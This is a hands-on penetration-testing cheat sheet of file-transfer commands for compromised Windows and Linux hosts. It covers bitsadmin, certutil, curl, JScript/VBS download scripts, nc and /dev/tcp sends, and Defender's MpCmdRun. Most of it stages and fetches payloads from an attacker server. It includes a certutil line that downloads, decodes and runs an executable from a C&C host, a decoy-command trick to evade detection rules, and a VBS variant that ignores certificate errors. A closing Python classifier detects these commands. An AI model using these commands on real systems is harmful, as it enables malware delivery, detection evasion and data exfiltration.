
[Hands-on] File transfer commands in penetration testing

Contents

bitsadmin

certutil

curl

ftp

js

nc

perl

php

py

scp

vbs

wget

WindowsDefender


bitsadmin

BITS does not speak FTP, and HTTPS works only when the server certificate chains to a CA the host trusts (self-signed certificates fail). It also needs an HTTP/1.1 server that answers HEAD requests and byte-range (Range) GET requests, which is why the simple HTTP servers bundled with PHP and Python error out.
>bitsadmin /transfer n http://192.168.1.192/Client.exe e:\1.exe
>bitsadmin /rawreturn /transfer getfile http://192.168.1.192/Client.exe e:\1.exe
>bitsadmin /rawreturn /transfer getpayload http://192.168.1.192/Client.exe e:\1.exe
>bitsadmin /transfer myDownLoadJob /download /priority normal "http://192.168.1.192/Client.exe" "e:\1.exe"
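The HEAD/Range requirement just described can be met without a full web server. The following is an added example, not code from the original page: a Python http.server subclass that answers HEAD (already provided by SimpleHTTPRequestHandler) and byte-range GET requests with 206 Partial Content, plus a self-test that serves a constructed Client.exe on the loopback interface and probes it the way a BITS client would. The host, port and file name are assumptions.

```python
# Added example (not from the original page): a minimal HTTP/1.1 file server
# that answers HEAD and byte-range GET requests with 206 Partial Content.
# BITS needs both, which is why the stock `python -m http.server` fails;
# this subclass adds Range handling on top of SimpleHTTPRequestHandler.
import functools
import os
import re
import tempfile
import threading
import urllib.request
from http.server import HTTPServer, SimpleHTTPRequestHandler

RANGE_RE = re.compile(r"^bytes=(\d*)-(\d*)$")


class RangeHandler(SimpleHTTPRequestHandler):
    protocol_version = "HTTP/1.1"  # BITS requires HTTP/1.1 (Content-Length, keep-alive)

    def do_GET(self):
        path = self.translate_path(self.path)
        m = RANGE_RE.match(self.headers.get("Range", "").strip())
        if m is None or not os.path.isfile(path) or m.group(0) == "bytes=-":
            return super().do_GET()  # no usable Range: plain 200 with Content-Length
        size = os.path.getsize(path)
        first, last = m.groups()
        if first == "":  # suffix form "bytes=-N": the last N bytes of the file
            start, end = max(size - int(last), 0), size - 1
        else:
            start = int(first)
            end = size - 1 if last == "" else min(int(last), size - 1)
        if start >= size or start > end:
            self.send_response(416)  # Range Not Satisfiable
            self.send_header("Content-Range", f"bytes */{size}")
            self.send_header("Content-Length", "0")
            self.end_headers()
            return
        length = end - start + 1
        self.send_response(206)
        self.send_header("Content-Type", self.guess_type(path))
        self.send_header("Accept-Ranges", "bytes")
        self.send_header("Content-Range", f"bytes {start}-{end}/{size}")
        self.send_header("Content-Length", str(length))
        self.end_headers()
        with open(path, "rb") as f:
            f.seek(start)
            self.wfile.write(f.read(length))


def serve(directory, bind="0.0.0.0", port=0):
    """Serve `directory` in a daemon thread; returns (server, bound_port)."""
    handler = functools.partial(RangeHandler, directory=directory)
    srv = HTTPServer((bind, port), handler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]


def probe(url, start, end):
    """Client-side check of what BITS will do: HEAD for the size, then a ranged GET.
    Returns ((head_status, content_length), (status, content_range, body))."""
    with urllib.request.urlopen(urllib.request.Request(url, method="HEAD")) as r:
        head = (r.status, int(r.headers["Content-Length"]))
    req = urllib.request.Request(url, headers={"Range": f"bytes={start}-{end}"})
    with urllib.request.urlopen(req) as r:
        part = (r.status, r.headers["Content-Range"], r.read())
    return head, part


def demo():
    """Serve a constructed 10240-byte 'Client.exe' on localhost and probe it."""
    d = tempfile.mkdtemp()
    data = bytes(range(256)) * 40  # constructed sample payload, not a real binary
    with open(os.path.join(d, "Client.exe"), "wb") as f:
        f.write(data)
    srv, port = serve(d, bind="127.0.0.1")
    url = f"http://127.0.0.1:{port}/Client.exe"
    try:
        head, part = probe(url, 100, 199)   # middle slice
        _, tail = probe(url, "", 16)        # suffix range: last 16 bytes
    finally:
        srv.shutdown()
        srv.server_close()
    return {"head": head, "part": part, "tail": tail, "data": data}


if __name__ == "__main__":
    r = demo()
    print(r["head"], r["part"][:2], r["part"][2] == r["data"][100:200])
```

demo() only exercises the handler on the loopback interface; to stage a payload for bitsadmin, call serve("/var/www/html", port=80) (binding port 80 needs root) and keep the process alive. Note that nothing here bypasses certificate validation: the server is plain HTTP, which is the case the page's commands use.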

certutil

>certutil.exe -urlcache -split -f http://192.168.1.192/Client.exe
>certutil.exe -urlcache -split -f http://192.168.1.192/Client.exe 1.exe
Delete the cache entry (otherwise the URL stays in the certutil URL cache as a forensic trace)
>certutil.exe -urlcache -split -f http://192.168.1.192/Client.exe delete
List the cache
>certutil.exe -urlcache *
Encode to base64 (run locally)
>certutil -encode lcx64.exe lcx64.txt
or
>certutil -encode d:\lcx64.exe d:\lcx64.txt
Then write the base64 text into a file on the target, for example line by line with echo
>echo xxxx>>d:\1.txt
Decode
>certutil -decode 1.txt lcx64.exe
Encode the file, download it, then decode and run it
>base64 payload.exe > /var/www/html/1.txt # generate the base64-encoded exe on the C&C server
>certutil -urlcache -split -f http://192.168.0.107/1.txt & certutil -decode 1.txt ms.exe & ms.exe
bypass (a decoy certutil chained in front of the real call defeats rules that match the raw command line from its start)
>Certutil & Certutil -urlcache -f -split url
>Certutil | Certutil -urlcache -f -split url

curl

>curl -o 1.exe http://192.168.1.192/Client.exe

ftp

>ftp
ftp> open 192.168.0.98 21
enter the username and password when prompted
ftp> dir    (list files)
ftp> get file.txt
Switch to binary mode before fetching an executable, or the transfer will corrupt it.


js

1.js (JScript: fetch with WinHttpRequest, write the binary body with ADODB.Stream)
var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);
WinHttpReq.Send();
var BinStream = new ActiveXObject("ADODB.Stream");
BinStream.Type = 1;                  // adTypeBinary
BinStream.Open();
BinStream.Write(WinHttpReq.ResponseBody);
BinStream.SaveToFile("1.exe", 2);    // adSaveCreateOverWrite
>cscript /nologo 1.js http://192.168.1.192/Client.exe


nc

Receiving side (listen and write everything that arrives to 1.txt)
>nc -lvnp 333 > 1.txt
Target machine (send test.txt; -q 1 makes nc exit one second after EOF on stdin, so the listener sees the end of the file; ncat uses --send-only instead)
>nc -vn 192.168.1.2 333 < test.txt -q 1
Or, without nc on the sending side, with bash's /dev/tcp pseudo-device
>cat 1.txt > /dev/tcp/1.1.1.1/333
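The nc exchange above, as an added example that is not part of the original page: both ends written in Python so it runs offline on localhost. The receiver reads until the sender signals EOF (what nc's -q or closing /dev/tcp does), and both sides hash what passed through, which is the check an operator wants before trusting a file that arrived over a raw TCP stream. Port numbers, file names and the sample payload are constructed.

```python
# Added example (not from the original page): the nc / /dev/tcp transfer with
# both ends in Python. The receiver stops only on EOF from the peer, and both
# sides compute SHA-256 so the operator can confirm the file arrived intact.
import hashlib
import os
import socket
import tempfile
import threading


def start_receiver(out_path, bind="127.0.0.1"):
    """Listener side (`nc -lvnp PORT > out_path`). Returns (port, result, thread);
    result is filled with {"bytes": n, "sha256": hex} once the peer closes."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((bind, 0))  # port 0: let the OS pick a free port
    srv.listen(1)
    port = srv.getsockname()[1]
    result = {}

    def run():
        conn, _ = srv.accept()
        srv.close()
        h = hashlib.sha256()
        n = 0
        with conn, open(out_path, "wb") as f:
            while True:
                chunk = conn.recv(65536)
                if not chunk:  # EOF: the sender closed its write side
                    break
                f.write(chunk)
                h.update(chunk)
                n += len(chunk)
        result.update(bytes=n, sha256=h.hexdigest())

    t = threading.Thread(target=run, daemon=True)
    t.start()
    return port, result, t


def send_file(host, port, path):
    """Sender side (`nc -vn HOST PORT < path -q 1` or `cat path > /dev/tcp/HOST/PORT`).
    Returns the SHA-256 of what was sent."""
    h = hashlib.sha256()
    with socket.create_connection((host, port)) as s, open(path, "rb") as f:
        while True:
            chunk = f.read(65536)
            if not chunk:
                break
            s.sendall(chunk)
            h.update(chunk)
        s.shutdown(socket.SHUT_WR)  # send EOF so the listener knows the file is complete
    return h.hexdigest()


def demo():
    """Round-trip a constructed 1 MiB file over loopback.
    Returns (sent_sha256, receiver_result, size_on_disk)."""
    d = tempfile.mkdtemp()
    src, dst = os.path.join(d, "test.txt"), os.path.join(d, "1.txt")
    with open(src, "wb") as f:
        f.write(os.urandom(1024 * 1024))  # constructed sample payload
    port, result, t = start_receiver(dst)
    sent = send_file("127.0.0.1", port, src)
    t.join(timeout=10)
    return sent, result, os.path.getsize(dst)


if __name__ == "__main__":
    sent, got, size = demo()
    print("sent", sent)
    print("got ", got.get("sha256"), size, "bytes",
          "OK" if sent == got.get("sha256") else "MISMATCH")
```

The same hash check applies to the real tools: run sha256sum on both hosts after the transfer. A listener that never sees EOF (sender killed, or nc without -q on a platform that keeps stdin open) will sit with a truncated file that still looks complete until the hashes are compared.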

perl

#!/usr/bin/perl 
use LWP::Simple; 
getstore("http://192.168.1.192/Client.exe", "1.exe");

php

#!/usr/bin/php
<?php
// file() splits the response into lines, so writing only $data[0] would truncate a
// binary after its first newline; file_get_contents() returns the whole body.
$data = file_get_contents("http://192.168.1.192/Client.exe");
$lf = "1.exe";
$fh = fopen($lf, 'wb');
fwrite($fh, $data);
fclose($fh);
?>

py

Python 2
>python -c 'import urllib;urllib.urlretrieve("http://192.168.1.192/Client.exe","/path/to/save/1.exe")'
Python 3 (urlretrieve moved to urllib.request)
>python3 -c 'import urllib.request;urllib.request.urlretrieve("http://192.168.1.192/Client.exe","/path/to/save/1.exe")'

scp

Transfer files on Linux (push file.txt to /tmp on the remote host over SSH)
>scp -P 22 file.txt user@1.1.1.1:/tmp

vbs

1.vbs (Msxml2.XMLHTTP + ADODB.Stream)
Set Post = CreateObject("Msxml2.XMLHTTP")
Set Shell = CreateObject("Wscript.Shell")
Post.Open "GET","http://192.168.1.192/Client.exe",0
Post.Send()
Set aGet = CreateObject("ADODB.Stream")
aGet.Mode = 3                      ' adModeReadWrite
aGet.Type = 1                      ' adTypeBinary
aGet.Open()
aGet.Write(Post.responseBody)
aGet.SaveToFile "C:\1.exe",2       ' adSaveCreateOverWrite
>cscript 1.vbs
Variant using Msxml2.ServerXMLHTTP, which can be told to ignore HTTPS certificate errors (useful against a self-signed C&C certificate)
Const adTypeBinary = 1
Const adSaveCreateOverWrite = 2
Dim http,ado
Set http = CreateObject("Msxml2.ServerXMLHTTP")
http.SetOption 2,13056             ' SXH_OPTION_IGNORE_SERVER_SSL_CERT_ERROR_FLAGS: ignore all certificate errors
http.open "GET","http://192.168.1.192/Client.exe",False
http.send
Set ado = CreateObject("Adodb.Stream")
ado.Type = adTypeBinary
ado.Open
ado.Write http.responseBody
ado.SaveToFile "c:\1.exe", adSaveCreateOverWrite
ado.Close
Writing to the root of C:\ needs an elevated prompt on current Windows; use a user-writable path otherwise.

wget

>wget http://192.168.1.192/Client.exe
>wget -b    download in the background
>wget -c    resume an interrupted download

WindowsDefender

MpCmdRun.exe, Defender's own command-line tool, has a -DownloadFile switch that fetches a URL to a path. It lives in the versioned Platform directory:
C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0>MpCmdRun.exe -DownloadFile -url http://192.168.2.105:8000/payload.c -path c:\\users\\test\\desktop\\1.c
The switch exists only in a narrow range of Defender platform versions around the 4.18.2008.x shown in the prompt; later platform versions dropped it, and real-time protection still scans whatever it writes, so check the installed version and MpCmdRun.exe -h before relying on it.


Other techniques

(screenshot in the original; not reproduced here)
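Seen from the defender's side, the bypass lines in the certutil section only defeat a rule that matches the raw command line from its start. The following added example (not from the original page) normalises dash variants and quoting and splits a command line on &, &&, | and || before matching, so the decoy prefix and copy-pasted en dashes are still caught. It is run over constructed sample command lines modelled on this page (e.g. the Process Command Line field of Windows event 4688 or Sysmon event 1); the tag names and sample lines are my own.

```python
# Added example (not from the original page): a small classifier for process
# command lines that flags the download primitives on this page. It normalises
# dash variants and quoting and splits on &, &&, |, || first, so the
# "Certutil & Certutil -urlcache ..." decoy and pasted en dashes still match.
import re
import shlex
import unicodedata

DASHES = "\u2010\u2011\u2012\u2013\u2014\u2212"  # hyphen look-alikes that survive NFKC
URL_RE = re.compile(r"^(?:https?|ftp)://", re.I)
SPLIT_RE = re.compile(r"\s*(?:&&|\|\||&|\|)\s*")


def normalize(cmdline):
    """Fold fullwidth/compatibility characters, unify dashes, lowercase."""
    s = unicodedata.normalize("NFKC", cmdline)
    s = s.translate({ord(c): "-" for c in DASHES})
    return s.lower()


def tokens(segment):
    """Split one command on whitespace, honouring quoted paths that contain
    spaces; fall back to a plain split if the quoting is unbalanced."""
    try:
        parts = shlex.split(segment, posix=False)
    except ValueError:
        parts = segment.split()
    return [p.strip("\"'") for p in parts if p.strip("\"'")]


def classify(cmdline):
    """Return the list of download primitives found in one command line."""
    hits = []
    for seg in SPLIT_RE.split(normalize(cmdline)):
        toks = tokens(seg)
        if not toks:
            continue
        prog = re.split(r"[\\/]", toks[0])[-1]  # basename of the executable
        if prog.endswith(".exe"):
            prog = prog[:-4]
        args = toks[1:]
        # certutil accepts both -flag and /flag; bitsadmin uses /flag
        flags = {a.lstrip("-/") for a in args if a[:1] in ("-", "/")}
        has_url = any(URL_RE.match(a) for a in args)
        if prog == "certutil" and "urlcache" in flags and has_url:
            hits.append("certutil_urlcache_download")
        elif prog == "certutil" and "decode" in flags:
            hits.append("certutil_decode")
        elif prog == "bitsadmin" and flags & {"transfer", "addfile"}:
            hits.append("bitsadmin_download")
        elif prog == "mpcmdrun" and "downloadfile" in flags:
            hits.append("mpcmdrun_download")
        elif prog in ("curl", "wget") and has_url:
            hits.append("curl_wget_download")
    return hits


# Constructed sample command lines (not real telemetry), modelled on this page.
SAMPLE_CMDLINES = [
    "Certutil & Certutil \u2013urlcache \u2013f \u2013split http://192.168.1.192/Client.exe",
    "certutil -urlcache -split -f http://192.168.0.107/1.txt & certutil -decode 1.txt ms.exe & ms.exe",
    "certutil -hashfile lcx64.exe SHA256",  # benign use of the same binary
    "bitsadmin /transfer n http://192.168.1.192/Client.exe e:\\1.exe",
    '"C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.9-0\\MpCmdRun.exe" '
    "-DownloadFile -url http://192.168.2.105:8000/payload.c -path c:\\users\\test\\desktop\\1.c",
]


def scan(cmdlines):
    """Map each command line to its hits; lines with no hits are omitted."""
    return {c: classify(c) for c in cmdlines if classify(c)}


if __name__ == "__main__":
    for line, hits in scan(SAMPLE_CMDLINES).items():
        print(hits, "<-", line)
```

The splitting on & is deliberate and cheap, but it also cuts URLs that carry a query string; a production rule would tokenize with the shell's quoting rules before splitting. The curl/wget tag is only interesting on hosts where those binaries are not normally present.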
